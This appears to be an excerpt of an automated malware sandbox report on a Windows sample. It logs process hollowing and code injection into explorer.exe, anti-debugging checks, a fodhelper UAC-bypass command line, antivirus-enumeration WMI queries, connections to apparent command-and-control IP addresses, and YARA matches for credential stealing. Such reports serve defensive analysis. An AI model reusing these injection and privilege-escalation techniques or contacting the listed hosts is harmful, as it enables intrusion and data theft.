                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_004059BA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_004059BA
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_00616230 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00616230
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_006233F9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_006233F9
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_00615D29 SetUnhandledExceptionFilter,12_2_00615D29
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_00615D35 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00615D35
                                Source: C:\ProgramData\Drivers\csrss.exeCode function: 15_2_006943E0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_006943E0
                                Source: C:\ProgramData\Drivers\csrss.exeCode function: 15_2_00694A78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00694A78
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeMemory allocated: page read and write | page guard

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Source: C:\Windows\explorer.exeFile created: wesswwi.1.drJump to dropped file
                                Source: C:\Windows\explorer.exeNetwork Connect: 104.21.46.59 80Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 34.143.166.163 80Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 104.198.2.251 80Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 104.21.45.142 443Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 211.168.53.110 80Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 34.94.245.237 80Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 104.21.88.149 443Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 2.180.10.7 80Jump to behavior
                                Source: C:\Windows\explorer.exeNetwork Connect: 180.94.156.61 80Jump to behavior
                                Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 91.215.85.17 80
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 6_2_02890110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,6_2_02890110
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeThread created: C:\Windows\explorer.exe EIP: 1381AD0Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\wesswwiThread created: unknown EIP: 3401AD0Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\CA06.exeThread created: unknown EIP: 8761A40
                                Source: C:\Users\user\AppData\Roaming\gwsswwiThread created: unknown EIP: 8741A40
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeMemory written: C:\Users\user\AppData\Local\Temp\8F78.exe base: 400000 value starts with: 4D5AJump to behavior
                                Source: C:\ProgramData\Drivers\csrss.exeMemory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeMemory written: C:\Users\user\AppData\Local\Temp\E36B.exe base: 400000 value starts with: 4D5A
                                Source: C:\ProgramData\Drivers\csrss.exeMemory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeMemory written: C:\Users\user\AppData\Local\Temp\E36B.exe base: 400000 value starts with: 4D5A
                                Source: C:\Windows\explorer.exeMemory written: PID: 3176 base: 4779C0 value: 90Jump to behavior
                                Source: C:\Windows\explorer.exeMemory written: PID: 5288 base: 7FF72B812D10 value: 90Jump to behavior
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                                Source: C:\Users\user\AppData\Roaming\wesswwiSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\wesswwiSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\CA06.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                                Source: C:\Users\user\AppData\Local\Temp\CA06.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                                Source: C:\Users\user\AppData\Roaming\gwsswwiSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                                Source: C:\Users\user\AppData\Roaming\gwsswwiSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4779C0Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeProcess created: C:\Users\user\AppData\Local\Temp\8F78.exe C:\Users\user\AppData\Local\Temp\8F78.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeProcess created: C:\Users\user\AppData\Local\Temp\A19A.exe C:\Users\user\AppData\Local\Temp\A19A.exeJump to behavior
                                Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeProcess created: C:\Users\user\AppData\Local\Temp\E36B.exe C:\Users\user\AppData\Local\Temp\E36B.exe
                                Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                                Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Users\user\AppData\Local\Temp\E36B.exe "C:\Users\user\AppData\Local\Temp\E36B.exe"
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 20
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeProcess created: C:\Users\user\AppData\Local\Temp\E36B.exe "C:\Users\user\AppData\Local\Temp\E36B.exe"
                                Source: explorer.exe, 00000001.00000000.1697656234.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1700756289.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1698884488.0000000004CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                                Source: explorer.exe, 00000001.00000000.1697656234.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                                Source: explorer.exe, 00000001.00000000.1697424437.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                                Source: explorer.exe, 00000001.00000000.1697656234.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                                Source: explorer.exe, 00000001.00000000.1697656234.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B589E0 cpuid 8_2_00007FF6E1B589E0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: GetLocaleInfoA,12_2_00409A8C
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl8 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl8\8.4 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl8\8.5 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl\encoding VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl\http1.0 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl\msgs VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl\opt0.4 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl\tzdata VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl\tzdata\Africa VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl\tzdata\America VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl\tzdata\America\Argentina VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl\tzdata\America\Indiana VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl\tzdata\America\Kentucky VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl\tzdata\America\North_Dakota VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl\tzdata\Antarctica VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\_ctypes.pyd VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\_tkinter.pyd VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\tcl\encoding VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\_hashlib.pyd VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\_socket.pyd VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\select.pyd VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\_ssl.pyd VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\_bz2.pyd VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322\_lzma.pyd VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64322 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A19A.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 6_2_004080DC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_004080DC
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005C1300 GetUserNameW,GetComputerNameW,12_2_005C1300
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B54E50 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,8_2_00007FF6E1B54E50
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: 21.1.E36B.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.2.E36B.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.1.E36B.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.E36B.exe.2d515a0.7.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.E36B.exe.400000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.E36B.exe.2dd15a0.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002A.00000002.3052219524.0000000000843000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.2204215062.0000000003213000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000001.2299335069.0000000000843000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000001.2202228549.0000000000843000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2293956463.0000000000843000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000028.00000002.2310762272.0000000003193000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 12.2.B43A.exe.5c0000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.B43A.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-HI55A.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-M5NA9.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-CV65T.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-N5RMT.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-M3SQC.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-JNRFN.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-LN8F3.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-N5KRR.tmp, type: DROPPED
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 11.0.B013.exe.dc0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000B.00000002.2315527223.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000000.2062162666.0000000000DC2000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\B013.exe, type: DROPPED
                                Source: Yara matchFile source: 3.2.wesswwi.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.3.CA06.exe.890000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 43.3.gwsswwi.25e0000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.3.wesswwi.910000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.ZRgv8wdMtR.exe.2480e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 43.2.gwsswwi.25d0e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.ZRgv8wdMtR.exe.2490000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.CA06.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.wesswwi.900e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.CA06.exe.880e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 43.2.gwsswwi.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.ZRgv8wdMtR.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000002.1711385659.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.1951376961.0000000000A11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000002.2192095995.0000000000A11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1645990983.0000000002490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000003.2405200857.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.1951330825.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000002.2458238302.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
